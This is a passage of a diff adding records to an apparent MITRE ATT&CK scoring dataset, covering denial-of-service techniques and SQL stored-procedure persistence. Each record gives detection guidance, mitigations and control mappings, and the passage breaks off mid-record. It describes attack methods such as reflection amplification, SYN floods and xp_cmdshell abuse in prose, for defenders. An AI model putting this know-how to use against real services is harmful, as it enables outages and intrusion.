+        "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)",
+        "url": "https://attack.mitre.org/techniques/T1498/001",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1498",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.14523809523809525,
+        "adjusted_score": 0.14523809523809525,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1498.002",
+        "name": "Network Denial of Service: Reflection Amplification",
+        "description": "Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)",
+        "url": "https://attack.mitre.org/techniques/T1498/002",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1498",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.15000000000000002,
+        "adjusted_score": 0.15000000000000002,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1499",
+        "name": "Endpoint Denial of Service",
+        "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n",
+        "url": "https://attack.mitre.org/techniques/T1499",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1499.001",
+                "name": "Endpoint Denial of Service: OS Exhaustion Flood",
+                "url": "https://attack.mitre.org/techniques/T1499/001",
+                "description": "Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)",
+                "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1499.002",
+                "name": "Endpoint Denial of Service: Service Exhaustion Flood",
+                "url": "https://attack.mitre.org/techniques/T1499/002",
+                "description": "Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)",
+                "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1499.003",
+                "name": "Endpoint Denial of Service: Application Exhaustion Flood",
+                "url": "https://attack.mitre.org/techniques/T1499/003",
+                "description": "Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)",
+                "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1499.004",
+                "name": "Endpoint Denial of Service: Application or System Exploitation",
+                "url": "https://attack.mitre.org/techniques/T1499/004",
+                "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.",
+                "detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.17857142857142855,
+        "adjusted_score": 0.17857142857142855,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.12857142857142856,
+            "mitigation_score": 0.21818181818181817,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1499.001",
+        "name": "Endpoint Denial of Service: OS Exhaustion Flood",
+        "description": "Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)",
+        "url": "https://attack.mitre.org/techniques/T1499/001",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1499",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.16904761904761906,
+        "adjusted_score": 0.16904761904761906,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1499.002",
+        "name": "Endpoint Denial of Service: Service Exhaustion Flood",
+        "description": "Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)",
+        "url": "https://attack.mitre.org/techniques/T1499/002",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1499",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.16428571428571428,
+        "adjusted_score": 0.16428571428571428,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1499.003",
+        "name": "Endpoint Denial of Service: Application Exhaustion Flood",
+        "description": "Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)",
+        "url": "https://attack.mitre.org/techniques/T1499/003",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1499",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.16428571428571428,
+        "adjusted_score": 0.16428571428571428,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1499.004",
+        "name": "Endpoint Denial of Service: Application or System Exploitation",
+        "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.",
+        "url": "https://attack.mitre.org/techniques/T1499/004",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1499",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.17857142857142855,
+        "adjusted_score": 0.17857142857142855,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "7.6",
+            "7.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1505",
+        "name": "Server Software Component",
+        "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.",
+        "url": "https://attack.mitre.org/techniques/T1505",
+        "tactics": [
+            "Persistence"
+        ],
+        "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1505.001",
+                "name": "Server Software Component: SQL Stored Procedures",
+                "url": "https://attack.mitre.org/techniques/T1505/001",
+                "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ",
+                "detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1045",
+                        "name": "Code Signing",
+                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                        "url": "https://attack.mitre.org/mitigations/M1045"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1505.002",
+                "name": "Server Software Component: Transport Agent",
+                "url": "https://attack.mitre.org/techniques/T1505/002",
